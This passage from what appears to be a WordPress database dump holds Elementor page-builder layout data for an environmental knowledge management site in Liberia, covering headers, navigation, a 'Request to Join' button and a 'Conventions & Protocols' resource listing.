layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd856c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"aeac97c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4a7222f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":15.19500000000000028421709430404007434844970703125},\"elements\":[],\"isInner\":false},{\"id\":\"8554b23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":84.76699999999999590727384202182292938232421875},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19591,2867,'_elementor_version','2.7.5'),(19592,2867,'_elementor_template_type','wp-post'),(19596,2868,'_wp_page_template','elementor_canvas'),(19597,2868,'_elementor_edit_mode','builder'),(19598,2868,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.7750000000000003552713678800500929355621337890625,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":67.7740000000000009094947017729282379150390625,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4fca764\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":22.550000000000000710542735760100185871124267578125},\"elements\":[{\"id\":\"9491976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Join us to help grow the EKMS Community\",\"align\":\"center\",\"text_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Request to Join\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#006400\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"rgba(1,68,33,0.64)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd856c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"aeac97c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4a7222f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":15.19500000000000028421709430404007434844970703125},\"elements\":[],\"isInner\":false},{\"id\":\"8554b23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":84.76699999999999590727384202182292938232421875},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19599,2868,'_elementor_version','2.7.5'),(19600,2868,'_elementor_template_type','wp-post'),(19604,2869,'_wp_page_template','elementor_canvas'),(19605,2869,'_elementor_edit_mode','builder'),(19606,2869,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.7750000000000003552713678800500929355621337890625,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":70.292000000000001591615728102624416351318359375,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4fca764\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":20.032000000000000028421709430404007434844970703125},\"elements\":[{\"id\":\"9491976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Join us to help grow the EKMS Community\",\"align\":\"center\",\"text_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Request to Join\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#006400\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"rgba(1,68,33,0.64)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd856c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"aeac97c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4a7222f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":15.19500000000000028421709430404007434844970703125},\"elements\":[],\"isInner\":false},{\"id\":\"8554b23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":84.76699999999999590727384202182292938232421875},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19607,2869,'_elementor_version','2.7.5'),(19608,2869,'_elementor_template_type','wp-post'),(19612,2870,'_elementor_edit_mode','builder'),(19613,2870,'_elementor_template_type','wp-page'),(19614,2870,'_elementor_version','2.7.5'),(19615,2870,'_wp_page_template','default'),(19616,2870,'_elementor_data','[{\"id\":\"a61ba74\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"78ccf48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9f48d08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0334fdc\",\"elType\":\"widget\",\"settings\":{\"block_title\":\"Conventions & Protocols\",\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"1\",\"posts_rows\":\"5\",\"image_size\":\"full\",\"excerpt_length\":18,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"meta_position\":\"after-excerpt\",\"show_date_icon\":\"fa fa-check-circle\",\"show_terms_tax\":\"resource_type\",\"post_type\":\"mea_resource\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"arrow_type\":\"fa fa-angle-double-left\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"6d9f001\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"a6995f5\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"get_permalink\",\"date_format\":\"F j, Y\"}],\"heading_title_color\":\"#000000\",\"heading_title_typography_typography\":\"custom\",\"heading_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"post_title_typography_font_weight\":\"700\",\"post_title_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]},\"post_text_color\":\"rgba(84,89,95,0.61)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"terms_link_color\":\"#ffffff\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"terms_link_typography_font_weight\":\"700\",\"terms_link_text_decor\":\"underline\",\"terms_link_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"arrows_style_popover_toggle\":\"custom\",\"arrows_style_box_font_color\":\"#000000\",\"arrows_style_box_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"posts_wrapper_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"featured_post_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"posts_list_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"filter_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"hidden_item_border_active_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"featured_post_border_border\":\"solid\",\"featured_post_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"post_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"post_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"post_content_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"post_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"post_border_color\":\"rgba(122,122,122,0.48)\",\"post_text_typography_font_weight\":\"600\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(19619,2871,'_elementor_edit_mode','builder'),(19620,2871,'_elementor_template_type','wp-page'),(19621,2871,'_elementor_version','2.7.5'),(19622,2871,'_wp_page_template','default'),(19623,2871,'_elementor_data','[{\"id\":\"a61ba74\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"78ccf48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9f48d08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0334fdc\",\"elType\":\"widget\",\"settings\":{\"block_title\":\"Conventions & Protocols\",\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"1\",\"posts_rows\":\"5\",\"image_size\":\"full\",\"excerpt_length\":15,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Learn More\",\"show_meta\":\"\",\"meta_position\":\"after-excerpt\",\"show_date_icon\":\"fa fa-check-circle\",\"show_terms_tax\":\"resource_type\",\"post_type\":\"mea_resource\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"arrow_type\":\"fa fa-angle-double-left\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"6d9f001\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"a6995f5\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"get_permalink\",\"date_format\":\"F j, Y\"}],\"heading_title_color\":\"#000000\",\"heading_title_typography_typography\":\"custom\",\"heading_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"post_title_typography_font_weight\":\"700\",\"post_title_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]},\"post_text_color\":\"rgba(84,89,95,0.61)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"terms_link_color\":\"#ffffff\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"terms_link_typography_font_weight\":\"700\",\"terms_link_text_decor\":\"underline\",\"terms_link_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"25\